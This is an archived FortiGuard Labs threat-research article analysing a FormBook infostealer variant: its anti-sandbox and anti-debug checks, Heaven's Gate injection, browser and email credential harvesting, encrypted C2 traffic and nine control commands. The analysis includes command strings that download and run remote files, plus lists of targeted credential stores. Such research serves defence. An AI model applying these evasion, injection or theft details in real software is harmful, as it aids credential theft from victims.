{ "id": "72ec91cd-9286-40ec-bc1b-2ad751cf2b93", "created_at": "2026-04-06T00:12:45.721023Z", "updated_at": "2026-04-10T03:37:08.626798Z", "deleted_at": null, "sha1_hash": "6f152f291107aa70fae888d111633b34ed37ff8c", "title": "Infostealer Malware FormBook Spread via Phishing Campaign – Part II | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 11304568, "plain_text": "Infostealer Malware FormBook Spread via Phishing Campaign –\r\nPart II | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2025-05-27 · Archived: 2026-04-05 14:50:20 UTC\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Fully remotely control the victim’s computer\r\nSeverity level: High\r\nBackground\r\nThis is part II of the FormBook analysis blog. In the previous post (Part I), I covered the campaign’s initialization\r\nvia a phishing email, the CVE-2017-11882 vulnerability it exploited to execute an extracted 64-bit DLL, and the\r\ndownload and decryption of a FormBook variant hidden in a fake PNG file. Finally, I elaborated on how the 64-bit\r\nDLL mapped the FormBook payload in a target process (ImagingDevices.exe) and executed it using the process\r\nhollowing technique.\r\nIn the second part of this analysis, you will learn how the FormBook payload operates on a comprised machine,\r\nincluding the complicated anti-analysis techniques employed by this FormBook variant, how the FormBook\r\nleverages Heaven’s Gate and randomly selected processes to evade analysis by cybersecurity researchers, the\r\nsensitive data it collects from the victim’s machine, how it communicates with the C2 server, and how it controls\r\nthe victim’s system with control commands.\r\nFormBook Analysis - Part II\r\nFormBook Execution inside ImagingDevices.exe\r\nThe FormBook payload is a 32-bit executable that runs inside the 32-bit target process “ImagingDevices.exe”.\r\nMy analysis reveals that the copied FormBook is re-encrypted. The code initially executed does not belong to the\r\nreal FormBook but instead serves as a decryption routine. The encrypted data begins at offset 0x6E36C3 (with\r\nFormBook loaded at 0x6E0000), and the encrypted data size is hard coded to 0x43600, as illustrated in Figure 1.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 1 of 29\n\nFigure 1: Calling a function to decrypt the FormBook payload\r\nNext, it calculates the real entry point address from the decrypted code and stores it in the ESI register. This\r\naddress will be called at the final stage, as shown in Figure 2.\r\nFigure 2: Ready to call the real entry point function via ESI\r\nAnti-Analysis Techniques\r\nFormBook leverages multiple techniques to prevent being analyzed. I explain the main techniques used in this\r\nvariant below.\r\nDuplicated Ntdll.dll\r\nFormBook loads and deploys a duplicated ntdll.dll in its memory. Whenever it calls APIs from Ntdll.dll, it\r\ncalls the address inside the duplicated ntdll.dll. As a result, FormBook becomes more complex to analyze,\r\nand researchers may be confused about what the API does. Figure 3 shows the memory tab where both\r\nntdll.dll instances are loaded.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 2 of 29\n\nFigure 3: Display of both the default Ntdll.dll and the duplicated Ntdll.dll in memory\r\nFigure 4 shows how it calls the ZwOpenDirectoryObject() API (0x2FE3580) inside the duplicated ntdll.dll. In my\r\nanalysis environment, the original address for the API should be 0x76F43580.\r\nFigure 4: Calling the ZwOpenDirectoryObject() API in the duplicated Ntdll.dll\r\nWindows System Modules and API Obfuscation\r\nWindows modules and APIs are obfuscated and dynamically resolved before being called. In Figure 5, we\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 3 of 29\n\ncan examine the entire process of obtaining an API. First, it decrypts the module name (“user32.dll”) by an\r\nindex (0xB).\r\nThis is a module list loaded dynamically by FormBook by their index.\r\nIndex Module Name\r\n0x1 \"kernel32.dll\"\r\n0x2 \"advapi32.dll\"\r\n0x3 \"ws2_32.dll\"\r\n0x4 \"rstrtmgr.dll\"\r\n0x5 \"sqlite3.dll\"\r\n0x6 \"winsqlite3.dll\"\r\n0x7 \"crypt32.dll\"\r\n0x8 \"vaultcli.dll\"\r\n0x9 \"ole32.dll\"\r\n0xA \"nss3.dll\"\r\n0xB \"user32.dll\"\r\n0xC \"shell32.dll\"\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 4 of 29\n\nFormBook then passes the decrypted module name to a function to load it using a low-level Windows API\r\nfunction, LdrLoadDll().\r\nFigure 5: The process of resolving the PostThreadMessageW() API\r\nThe desired Windows APIs are not hardcoded strings in FormBook but encrypted hash codes. FormBook traverses\r\nthe APIs inside the loaded modules and matches their hash codes with the decrypted ones to find the desired APIs.\r\nAs you can see in Figure 5, the PostThreadMessageW() API was obtained inside the EAX register from the\r\n“user32.dll” module.\r\nKey Functions Dynamically Decrypted\r\nIn this variant of FormBook, more than 100 key functions are encrypted by default and are decrypted only before\r\ncalling. They are then re-encrypted after calling, which presents a challenge for static analysis.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 5 of 29\n\nFigure 6: Overview of the code structure used to dynamically decrypt a function\r\nAs shown on the left side of Figure 6, the SearchDecryptCode() function is called to search the encrypted code by\r\nlocating the given start magic (6 bytes) and end magic (6 bytes). It then decrypts the located code.\r\nAt 0x709B15, it calls sub_70DC33(), whose body is shown on the right side. The instructions enclosed by the red\r\nrectangle were just decrypted.\r\nAfter executing the dynamic function (sub_70DC33()), it calls ReEncryptCode(), at 0x709B26, to re-encrypt the\r\nfunction.\r\nAnti-Sandbox\r\nTo protect FormBook from being analyzed by auto-analysis platforms, it performs multiple detections.\r\n1. Virtual Machines and Analysis Tools\r\nFormBook contains a predefined blacklist of encrypted hash codes, which are generated from process names\r\nassociated with popular VM platforms or analysis tools, such as VMware (vmwareuser.exe, vmwareservice.exe),\r\nSandboxie (sandboxiedcomlaunch.exe, sandboxierpcss.exe), Sysinternals tools (procmon.exe, regmon.exe,\r\nfilemon.exe), network sniffers (wireshark.exe, netmon.exe), automation scripts (python.exe, perl.exe), and more.\r\nIt retrieves all active processes from the victim’s system, generates a hash code from their process names, and\r\ncompares them with a predefined set of blacklisted hash codes.\r\nThe following code snippet demonstrates how it decrypts a hash code from 0x72FE2A27, which is 0x3EBE9086\r\ngenerated from “vmwareuser.exe”.\r\n……\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 6 of 29\n\n006F642A    lea   ecx, [ebp+Dest] ; Current process name.\r\n006F6430    push  ecx\r\n006F6431    push 3Ah           ; Decryption key.\r\n006F6433    push 72FE2A27h     ; Encrypted hash code.\r\n006F6438    call   decrypt_fun   ; Decrypts a hash code.\r\n006F643D    add  esp, 8\r\n006F6440    push eax    ; EAX holds the decrypted hash code, 0x3EBE9086, which is generated from\r\n“vmwareuser.exe”.\r\n006F6441    call   match_hashcode ; Compares with the current process.\r\n006F6446    add  esp, 8\r\n006F6449    test eax, eax\r\n006F644B    jnz analysis_detected\r\n……\r\nOnce matched, it sets a global flag indicating it’s running in an analysis environment.\r\n2. Detecting Sandbox Environments\r\nSome auto-analysis sandboxes run the target process from specific folders. FormBook detects this by retrieving\r\nthe full path of the target process it hollowed into. In my analysis machine, it’s:\r\n“C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe”.\r\nIt then checks if the parent folder contains keywords from a blacklist by matching their hash codes. Examples\r\ninclude:\r\n“\\cuckoo\\”, “\\sandcastle\\”, “\\aswsnx\\”, “\\sandbox\\”, “\\smpdir\\”, “\\samroot\\”, and “\\avctestsuite\\”\r\nBelow is an example of full path triggers detection:\r\n“C:\\cuckoo\\Windows Photo Viewer\\ImagingDevices.exe”\r\n3. Windows Account Name\r\nIt calls the Windows API RtlQueryEnvironmentVariable_U() with “USERNAME” as the variable name to retrieve\r\nthe victim’s username. Figure 7 demonstrates the retrieved username after calling the API.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 7 of 29\n\nFigure 7: Retrieving the username “win-10”\r\nIt then generates a hash code from the username and compares it with those in a blacklist. FormBook assumes the\r\nusernames starting with certain patterns (e.g., “cuckoo”, “sandbox-“, “nmsdbox-“, and more) belong to auto-analysis systems.\r\nAll of the above detection results are stored in global flags. FormBook checks these flags in a function and exits\r\nthe process if any of them is set.\r\nAnti-Debug\r\nIt checks if a kernel-mode debugger (like Windbg) is enabled by calling the API NtQuerySystemInformation()\r\nwith SystemKernelDebuggerInformation(0x23) system information class. Refer to Figure 8 for more details.\r\nFigure 8: Checking for a kernel debugger\r\nIf the KernelDebuggerEnabled is 1, it means a kernel debugger is present.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 8 of 29\n\nIt also determines if the user-mode debugger is present by passing ProcessDebugPort (0x7) as a\r\nProcessInformationClass parameter to the ZwQueryInformationProcess() API. It returns 0xFFFFFFFF if a user-mode debugger is attached, such as x32dbg, which I used during the analysis.\r\nHeaven’s Gate Technique\r\nThe Heaven’s Gate technique is a mechanism on Windows x64 systems that allows switching from 32-bit to 64-bit\r\ncode inside a 32-bit process. It is also known as WoW64 (Windows-on-Windows 64-bit).\r\nThis transition is the essence of “Heaven’s Gate.” The mechanism presents a significant challenge to cybersecurity\r\nresearchers because a 32-bit debugger cannot debug 64-bit code, interrupting the debugging process.\r\nThe Windows x64 architecture determines the execution mode based on the CS (Code Segment) register. In user\r\nmode (ring 3), 0x23 corresponds to the 32-bit code segment, while 0x33 corresponds to the 64-bit code segment.\r\nExecuting an instruction like “jmp far 0x33:{address}” in a 32-bit process switches to 64-bit mode and executes\r\n64-bit code from the {address}.\r\nThis variant of FormBook uses the Heaven’s Gate technique multiple times, which will be explained in the\r\nfollowing sections.\r\nRandom Process Selection\r\nFormBook randomly selects one of the explorer.exe child processes from active processes and leverages the\r\nHeaven’s Gate technique to manipulate the selected process.\r\nThe malware first calls the NtQuerySystemInformation() API with the SystemProcessInformation (0x5) parameter\r\nto enumerate all active processes. It locates the PID (Process ID) of explorer.exe by comparing process name hash\r\ncodes.\r\nNext, it scans the active processes to randomly choose a child process of explorer.exe by matching the active\r\nprocesses’ PPID (Parent Process ID) with the explorer.exe’s PID (Figure 9).\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 9 of 29\n\nFigure 9: How FormBook selects a child process of explorer.exe\r\nAfter obtaining the process handle of the selected process (e.g., notepad.exe) by calling the NtOpenProcess() API,\r\nFormBook creates a shared memory between the two processes and copies the shellcode:\r\n1. Creates a shared memory section (via ZwCreateSection()).\r\n2. Maps it to both the target and current process (via NtMapViewOfSection()).\r\n3. Copies of the shellcode are added to the target process through this shared memory.\r\nIt then utilizes the Heaven’s Gate technique to execute a piece of 64-bit code that had been copied and deployed in\r\na newly allocated buffer.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 10 of 29\n\nFigure 10: The Heaven’s Gate Invocation\r\nFigure 10 is about to execute “jmp far 33:2F30000”, where 0x33 is the new CS and 0x2F30000 is the new buffer’s\r\naddress with the copied 64-bit code, as shown in the memory.\r\nUpon completion, it returns to 23:7107C0, which has already been pushed onto the top of the stack.\r\n64-bit Code Execution for Process Control\r\nMy analysis reveals that the 64-bit code takes control of the selected process’s main thread (like notepad.exe) to\r\nexecute a piece of injected malicious code.\r\nTo control the selected process, it calls the NtOpenProcess() and ZwQueryInformationProcess() APIs to retrieve\r\nthe process’ details.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 11 of 29\n\nThe APIs ZwOpenThread() and ZwSuspendThread() are called to pass the selected process’ information to\r\nsuspend the main thread inside the selected process. In Figure 11, we can see that the 64-bit code just called\r\nZwSuspendThread(), and in another debugger attached to the chosen process, it displays the suspended main\r\nthread.\r\nFigure 11: The main thread has just been suspended\r\nSubsequently, the 64-bit code copies the malicious payload into the selected process over the shared memory. It\r\nthen calls NtGetContextThread() and NtSetContextThread() to modify the RIP register, redirecting the execution\r\nto the injected code.\r\nFinally, it calls the NtResumeThread() API to resume the main thread, causing the malicious code to run inside the\r\nselected process, notepad.exe. Execution then returns to the 32-bit code by executing a “retf” instruction.\r\nDiving into the Malicious Code Running in a Selected Process\r\nThis time, the selected child process of explorer.exe is a Notepad.exe with the PID 9560.\r\nThe copied malicious code is the same as the 64-bit code mentioned earlier, but it goes down different code\r\nbranches depending on a returned flag.\r\nTwelve encrypted process names are saved in local variables, which can be obtained using a function with a string\r\nindex. The table below lists all the processes and indexes.\r\nString Index Process Names\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 12 of 29\n\n0x0 \"PATHPING.EXE\"\r\n0x1 \"fontview.exe\"\r\n0x2 \"MuiUnattend.exe\"\r\n0x3 \"forfiles.exe\"\r\n0x4 \"chkntfs.exe\"\r\n0x5 \"find.exe\"\r\n0x6 \"DpiScaling.exe\"\r\n0x7 \"waitfor.exe\"\r\n0x8 \"net.exe\"\r\n0x9 \"icsunattend.exe\"\r\n0xa \"cttune.exe\"\r\n0xb \"whoami.exe\"\r\nThese 32-bit processes all reside in the “C:\\Windows\\SysWOW64\\” folder. FormBook repeatedly launches these\r\nprocesses in a loop until one is successfully created. It then performs process hollowing on the process, injects the\r\nFormBook payload into the process (such as “PATHPING.EXE”), and executes it.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 13 of 29\n\nFigure 12: Creation of a suspended process\r\nAs shown in Figure 12, it is about to call the CreateProcessInternalW() API to create a PATHPING.EXE process,\r\nwith the dwCreationFlags parameter set to 0x800000C, indicating a suspended process will be created.\r\nFigure 13: Process tree view of the created PATHPING.EXE\r\nIt then creates a shared memory section between notepad.exe and PATHPING.EXE. At this point, the task of the\r\ncode running in the selected process (notepad.exe) is completed.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 14 of 29\n\nSwitching to the target process (ImagingDevices.exe), it returns to the 32-bit code mode from the 64-bit code via\r\nHeaven’s Gate. It brings the full process information of the newly created PATHPING.EXE process using the\r\nshared memory established between it and the selected notepad.exe process.\r\nImagingDevices.exe takes control of the PATHPING.EXE process and copies the FormBook payload into the\r\nPATHPING.EXE process via the shared memory section. As shown in Figure 14, the payload is encrypted and\r\nmapped into both processes’ memory, having been written by code running inside ImagingDevices.exe.\r\nFigure 14: Shared memory section mapped into both processes with the FormBook payload\r\nNext, ImagingDevices.exe calls the NtSetContextThread() API to modify the PATHPING.EXE’s EAX register\r\n(which holds a thread function address to RtlUserThreadStart().) to redirect the execution to a specific function.\r\nThis function decrypts the FormBook payload and calls the entry point function of the FormBook payload once\r\nthe NtResumeThread() API is called.\r\nA Look into the FormBook Payload\r\nAfter employing numerous evasion techniques, FormBook finally hits the main payload within the\r\nPATHPING.EXE process, another 32-bit process.\r\nBased on my analysis, this process function acts as a dashboard program for FormBook. It gathers sensitive data\r\nfrom the victim’s system and manipulates another selected process to communicate with its C2 server.\r\nCollecting Basic Information\r\nFormBook collects basic information from the victim’s device, such as the Windows product name, the current\r\nbuild, the username, and the computer name. Some are obtained from the system registry via API calls, while\r\nothers are retrieved using the RtlQueryEnvironmentVariable_U() API. This information is then encrypted and\r\nsaved in a global variable, which is later sent to the C2 server in an HTTP GET packet to register the infected\r\nsystem.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 15 of 29\n\nFigure 15: Encrypting basic system information\r\nAs shown in Figure 15, the malware prepares to encrypt the collected basic information, where “XLNG…” is a\r\nmagic string, “Windows 10 Enterprise x64” is the Windows product information, followed by the Base64-encoded\r\ncomputer name and user name.\r\nBuilding a Socket Process\r\nFormBook then randomly selects another child process of explorer.exe. Similar to what was done in the\r\nImagingDevices.exe process, it invokes 64-bit code from the 32-bit process using the Heaven’s Gate technique.\r\nThis 64-bit code copies and deploys the FormBook into the newly selected process (e.g., another notepad.exe\r\nprocess) and modifies the RIP register to point to the deployed FormBook at a different entry point.\r\nAccording to my analysis, this newly selected process acts as a socket process responsible for communicating\r\nwith the C2 server. A large shared memory section is created and mapped into PATHING.EXE and the chosen data\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 16 of 29\n\nexchange process.\r\nFigure 16: Sending WM_COMMAND to the newly selected process.\r\nWhen it returns to 32-bit mode (using Heaven’s Gate) in the PATHPING.EXE process, FormBook calls the\r\nPostThreadMessageW() API with a Msg parameter of 0x111 (WM_COMMAND) to send a message to the main\r\nthread of the selected process (like notepad.exe), as shown in Figure 16.\r\nInstead of calling NtResumeThread() to resume thread execution, FormBook sends a Windows message to\r\nactivate the payload. Why does it send a message to run the FormBook as a socket process?\r\nAs we know, most Windows programs are driven by Windows messages. Most of the time, a program remains idle\r\nbecause the message queue is empty—there is no user interaction (mouse, keyboard, etc.), system events, or other\r\nmessages. The program waits (blocked by the NtUserGetMessage() API) until a new message arrives.\r\nIf FormBook modifies the value of the RIP register to point to the copied FormBook payload and then proactively\r\nsends a message to the process, it can then hijack the original execution flow and redirect it to run the FormBook\r\npayload instead.\r\nThe FormBook instance in PATHPING.EXE also acts as a daemon, monitoring the socket process. Once the\r\nvictim terminates the socket process, FormBook immediately selects another child process of explorer.exe to take\r\nits place.\r\nSensitive Data Collection\r\nThe FormBook instance running in PATHPING.EXE harvests sensitive data from the compromised system, such\r\nas saved credentials of various software, autofill data, cookies, proxy settings for browsers, and data from the\r\nsystem clipboard.\r\nFormBook can also obtain sensitive data from multiple resources, such as the system registry and the local profile\r\nfiles.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 17 of 29\n\nFor example, it extracts the autofill data for the IE browser from the key path\r\n“HKCU\\SOFTWARE\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2” in the system registry.\r\nIt also collects email account information from Outlook by scanning the following key paths in the system registry\r\nto cover multiple Outlook versions:\r\nHKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging\r\nSubsystem\\Profiles\\Outlook\\\r\nHKCU\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\\r\nHKCU\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook_2016\\\r\nWhen gathering sensitive data from Chrome, FormBook accesses some SQLite database format files located in\r\n“%LocalData%\\Google\\Chrome\\User Data\\Login Data\\Default\\”, explicitly targeting these files: “Login Data”\r\n(credentials), “Cookies” (web site cookies), “Web Data” (autofill), and “Network” (proxy setting).\r\nThis is accomplished through a series of winsqlite3.dll API calls, including sqlite3_open(), sqlite3_prepare_v2(),\r\nsqlite3_step(), sqlite3_column_text(), sqlite3_column_blob(), sqlite3_column_bytes(), and sqlite3_close().\r\nFigure 17: A display of obtained credentials saved for Chrome\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 18 of 29\n\nFigure 17 demonstrates Chrome credential extraction, showing FormBook executing the SQL query “SELECT\r\norigin_url, username_value, password_value FROM logins” via the sqlite3_prepare_v2() API.\r\nThe sample credentials, shown at the bottom, were just obtained from a Chrome browser in a test environment.\r\nThe malware maintains the capability to collect similar sensitive data from a wide range of additional applications.\r\nBelow are the categorized software applications from which FormBook can collect sensitive data:\r\nEmail Clients:\r\nOutlook, Thunderbird, and Foxmail.\r\nWeb Browsers:\r\nInternet Explorer, Chrome, Firefox, Edge, Brave-Browser, Opera Neon, ChromePlus, Avast Secure Browser,\r\nYandex Browser, Citrio, Sleipnir 5, Epic Privacy Browser, Elements Browser, 360 Chrome, CCleaner Browser,\r\nSputnik, Cốc Cốc Browser, Opera, Uran, Coowon Browser, Comodo Dragon, AVG Secure Browser, CentBrowser,\r\n7Star Browser, UR Browser, SalamWeb, QIP Surf, Chromium, Iridium Browser, Slimjet, Vivaldi, Orbitum,\r\nLiebao, Kometa Browser, Chedot, Torch Browser, Amigo, Kinza, and Blisk,\r\nCommunicating with the C2 Server\r\nLet’s now examine the socket process (another selected process, like notepad.exe) that handles communication\r\nwith the Command-and-Control (C2) server in the background.\r\nThe C2 domain list in this variant of FormBook is not stored in plaintext. Instead, it undergoes a multi-layered\r\nobfuscation process. Each domain is encrypted, encoded using Base64, and then encrypted again.\r\nThis technique adds significant complexity to static analysis and helps evade detection. This variant has 64 C2\r\ndomains, which are dynamically retrieved in the socket process by referencing a one-byte index. The decrypted\r\ndomains only exist temporarily in memory during runtime, making them more elusive. For the complete list of C2\r\ndomains, refer to the IOCs section at the end of this report.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 19 of 29\n\nFigure 18: Decrypted C2 server domain\r\nFigure 18 shows the socket process after successfully decrypting a C2 server domain from memory. The decrypted\r\ndomain is “www[.]manicure-nano[.]sbs,” corresponding to index 0x2B, with the associated URL “/xkx8/”.\r\nA shared memory section is created between PATHPING.EXE and the socket process (like notepad.exe), which is\r\nused to share:\r\nSensitive data collected by FormBook within PATHPING.EXE\r\nPacket data received from the C2 server.\r\nVarious flag variables used to signal actions to the two FormBooks instances, such as data ready to send,\r\nC2 packet received, etc.\r\nAnother responsibility of the socket process is to gather system clipboard data. FormBook performs this by\r\nrunning a thread calling the relevant APIs: OpenClipboard(), GetClipboardData(), GlobalLock(), GlobalUnlock(),\r\nand CloseClipboard(). The collected clipboard data is also stored in shared memory.\r\nWithin the socket process, FormBook starts a specific thread to repeatedly check if a flag is set by\r\nPATHPING.EXE that tells if the collected data is ready to send. Once the flag is triggered, FormBook transmits\r\nthe collected data using HTTP GET and POST. Based on my analysis, basic system information is sent via GET,\r\nand other data is sent via POST.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 20 of 29\n\nFigure 19: Encrypting collected data before sending to the C2 server\r\nAs shown in Figure 19, execution breaks at a function call (located at 0x1F08625B1D1) that is responsible for\r\nencrypting collected credentials—retrieved from Mozilla Firefox in this instance—in the memory dump before\r\nsending them to the C2 server.\r\nTo evade detection during transmission, FormBook encrypts and encodes the data before sending it out. Each C2\r\nserver has its own unique 0x14-byte-long encryption key seed hardcoded in memory. The data undergoes two\r\nlayers of encryption. It first uses a common predefined key to encrypt the data, then uses the C2 server’s own\r\nencryption key to encrypt it again. After this double encryption, FormBook encodes the data using the standard\r\nbase64 algorithm. \r\nFigure 20 shows a screenshot of an HTTP Post packet in Wireshark, illustrating how FormBook sends collected\r\ndata to a C2 server.\r\nThe URL in this case is www[.]grcgrg[.]net/jxyu/. The encrypted data is located in the body portion of the POST\r\nrequest, prefixed with a randomly generated string, “30J0cVz=”.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 21 of 29\n\nFigure 20: Sending collected data via HTTP POST\r\nControl Commands\r\nAs mentioned before, when the socket process receives a command packet from the C2 server, it saves it in shared\r\nmemory and sets a corresponding flag. This informs the FormBook instance running in the PATHPING.EXE to\r\nprocess the C2 command.\r\nAll incoming packets from the C2 server are multi-layer encrypted and Base64-encoded. Once received, the\r\nPATHPING.EXE instance decrypts and decodes the packets before interpretation.\r\nA decrypted packet format looks like this:\r\n“XLNG{command ID}{command data}{XLNG}”\r\nThe “XLNG” prefix string is a magic marker. All C2 command packets must start with it. Otherwise, the\r\npacket will be discarded.\r\nThe subsequent one-byte value is the command ID, which ranges from ‘1’ to ‘9’ (0x31- 0x39).\r\nThe following portion is the command data.\r\nThe last “XLNG” is an optional end marker, required only by the commands ‘1’, ‘2’, ‘4’, and ‘9’.\r\nFormBook Control Commands:\r\n1.     ‘1’ – 0x31:\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 22 of 29\n\nThis command delivers three kinds of executable files within the packet: *.dll, *.ps1, and *.exe. Once this\r\ncommand is received, FormBook saves the file into the system %temp% directory and then executes it on the\r\nvictim’s system.\r\n2.     ‘2’ – 0x32:\r\nThis command can be used to update the FormBook or execute other malware.\r\nFormBook receives a 32-bit EXE file in the packet and saves it into a randomly generated temp file within the\r\nsystem. After that, it executes the EXE file by invoking the CreateProcessInternalW() API. As shown in Figure 21,\r\nit just wrote the 32-bit EXE data into a temp file, such as “%temp%\\yzbtfb3.exe.”\r\nFigure 21: FormBook just wrote a received EXE file into a temp file\r\nIt finally calls ExitProcess() to exit the current FormBook process (PATHPING.EXE).\r\n3.     ‘3’ – 0x33:\r\nThis command is used to remove FormBook from the victim’s system.\r\nIt deletes Formbook's file and Auto-run items from the system registry and exits the current FormBook instance.\r\nIt also restarts the Explorer.exe process.\r\n4.     ‘4’ – 0x34:\r\nWhen FormBook receives this command, it downloads an executable file from a given URL that comes with the\r\npacket if a subcommand is provided. Otherwise, it only executes a given command.\r\nThis variant of FormBook provides two sub-commands:\r\n“RMTD”: Downloads and executes an EXE file.\r\n“RMTU”: Downloads and runs a PowerShell file.\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 23 of 29\n\nBelow are three cases that demonstrate how the ‘4’ command works.\r\nWithout sub-command:\r\nXLNG4cmd.exeXLNG\r\nRMTD sub-command:\r\nXLNG4RMTD:http://test.com/test.exeXLNG\r\nRMTU sub-command:\r\nXLNG4RMTU:http://test.com/test.ps1XLNG\r\nFormBook downloads the file into a randomly named file under the system’s %temp% folder. It calls a series of\r\nAPIs to do so, such as InternetOpenW(), InternetConnectW(), HttpOpenRequestW(), HttpSendRequestW(),\r\nInternetQueryDataAvailable(), and InternetReadFile().\r\nFinally, FormBook calls ShellExecuteA to execute the downloaded file in the compromised system.\r\nIf no sub-commend is provided in the command data, it means the command data is not a URL, which can be\r\nexecuted directly by calling the ShellExecuteA() API.\r\nFigure 22 provides an example with a simulated control command packet, which was about to call an API to\r\nlaunch “C:\\Windows\\system32\\mspaint.exe”.\r\nFigure 22: Example of the ‘4’ command without sub-commands\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 24 of 29\n\n5.     ‘5’ – 0x35:\r\nThis command allows FormBook to clean sensitive data saved on the victim's browsers, such as cookies,\r\ncredentials, and more.\r\nIt also deletes some folders and files from the compromised system by calling the SHFileOperationW() API. The\r\naffected paths are:\r\n• \"%WinDir%\\Cookies\"\r\n• \"%AppData%\\Microsoft\\Windows\\Cookies\"\r\n• \"%AppData%\\Microsoft\\Windows\\Cookies\\Low\"\r\n• \"%LocalAppData%\\Microsoft\\Windows\\INetCookies\"\r\n• \"%LocalAppData%\\Microsoft\\Windows\\INetCookies\\Low\"\r\n• \"%LocalAppData%\\Google\\Chrome\\User Data\\Default\\Login Data\"\r\n• \"%LocalAppData%\\Google\\Chrome\\User Data\\Default\\Cookies\"\r\n• \"%LocalAppData%\\Google\\Chrome\\User Data\\Default\\Current Session\"\r\n• \"%APPDATA%\\Mozilla\\Firefox\\Profiles\\{ProfileName}\\Cookies.sqlite\"\r\n6.     ‘6’ – 0x36:\r\nThis command instructs FormBook to collect sensitive data that will be sent to the C2 server, as explained in the\r\n“Collect Sensitive Data” section above.\r\n7.     ‘7’ – 0x37:\r\nReboots the victim’s device.\r\nFormbook calls the API ExitWindowsEx() with the EWX_FORCEIFHUNG | EWX_REBOOT parameter to\r\nreboot the system.\r\n8.     ‘8’ – 0x38:\r\nPowers off the victim’s device.\r\nFormbook calls the API ExitWindowsEx() with the EWX_FORCEIFHUNG | EWX_POWEROFF parameter to\r\npower off the system.\r\n9.     ‘9’ – 0x39:\r\nIn this variant, the command corresponds to an empty function.\r\nSummary\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 25 of 29\n\nFigure 23: Diagram illustrating the overall workflow of the FormBook payload\r\nIn this second part of the FormBook blog series, I explained how the FormBook payload operates within the 32-\r\nbit target process, “ImagingDevices.exe.” Figure 23 provides an overview of the entire workflow executed by the\r\npayload. I also showed the various complicated anti-analysis techniques used by this FormBook variant, including\r\n—but not limited to—a hidden ntdll.dll module, API obfuscation, more than 100 encrypted key functions, anti-sandbox techniques, anti-debugging, and the repeated use of Heaven’s Gate techniques.\r\nI then explained how FormBook randomly selects a process from active processes and takes control of it using the\r\nHeaven’s Gate technique. Its main objective is to perform process hollowing on the selected process (say\r\nPATHPING.EXE), inject FormBook into the process, and execute it as a dashboard.\r\nOnce running, FormBook collects a wide range of sensitive data from the victim’s system, including, but not\r\nlimited to, basic system information, saved credentials, cookie data, autofill data, browser history, and more.\r\nNext, I described how the C2 server list in this FormBook variant is decrypted and decoded, and how stolen\r\nsensitive data is formatted and transmitted in network packets.\r\nFinally, I examined FormBook’s nine control commands, which enable a wide array of capabilities, such as\r\nexecuting provided executable files, launching an existing file, downloading and executing EXE, DLL, and PS1\r\nfiles, and remotely rebooting or shutting down the victim’s machine.\r\nFortinet Protections\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 26 of 29\n\nFortinet customers are already protected from this campaign with FortiGuard’s AntiSPAM, Web Filtering, IPS,\r\nand AntiVirus services as follows:\r\nThe FortiGuard’s Anti-Botnet Service has blocked the DNS requests for accessing FormBook’s C2 server.\r\nThe C2 server list is rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard\r\nAntiVirus engine is part of each solution. As a result, customers who have these products with up-to-date\r\nprotections are already protected.\r\nYou can sign up to receive future alerts 